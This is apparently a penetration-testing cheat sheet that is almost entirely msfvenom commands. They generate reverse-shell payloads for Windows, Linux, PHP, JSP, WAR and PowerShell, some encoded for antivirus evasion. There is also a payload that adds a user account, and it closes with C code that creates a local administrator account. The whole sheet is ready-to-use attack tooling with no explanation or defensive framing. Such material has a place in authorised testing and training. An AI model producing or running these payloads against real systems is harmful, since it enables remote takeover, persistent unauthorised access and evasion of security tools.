Listing Available Options
Copy msfvenom -l payloads # Payloads
msfvenom -l encoders # Encoders
msfvenom -l platforms # Platforms
msfvenom -l formats # Formats
Copy msfvenom -p windows/shell_reverse_tcp LHOST= 192.168.1.1 LPORT= 1337 -f asp > asuka.asp
Copy msfvenom -p php/reverse_php LHOST= < I P > LPORT= < POR T > -f raw > shell.php
echo "<?php" | cat - shell.php > temp && mv temp shell.php
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST= < I P > LPORT= 31337 -f raw > shell.jsp
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST= < I P > LPORT= 31337 -f war > shell.war
Copy msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe -o adduser.exe
Copy # x86
msfvenom -a x86 -p windows/exec CMD= "calc.exe" -e x86/shikata_ga_nai -f exe -o payload.exe
# x64
msfvenom -p windows/x64/exec CMD= "calc.exe" -f exe -e x64/xor_dynamic -o payload-x64.exe
Copy # x86
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT= 4443 -f exe -e x86/shikata_ga_nai -o reverse86.exe
# x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT= 4443 -f exe -e x64/xor_dynamic -o reverse64.exe
Copy msfvenom -p windows/x64/shell_reverse_tcp LHOST=wlan0 LPORT= 31337 -f psh -e x64/xor_dynamic -o rev.ps1
Copy # x86
msfvenom -p linux/x86/shell_reverse_tcp LHOST=tun0 LPORT= 1337 -e x86/shikata_ga_nai -f elf -o asuka-x86.elf
# x64
msfvenom -a x64 -p linux -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT= 1337 -e x64/xor_dynamic -f elf -o asuka-64.elf
Copy #include <stdlib.h>
int main ()
{
int i;
i = system ( "net user admoon Linuxsec#1337 /add" ) ;
i = system ( "net localgroup administrators admoon /add" ) ;
return 0 ;
}
Copy x86_64 - w64 - mingw32 - gcc adduser.c - o adduser.exe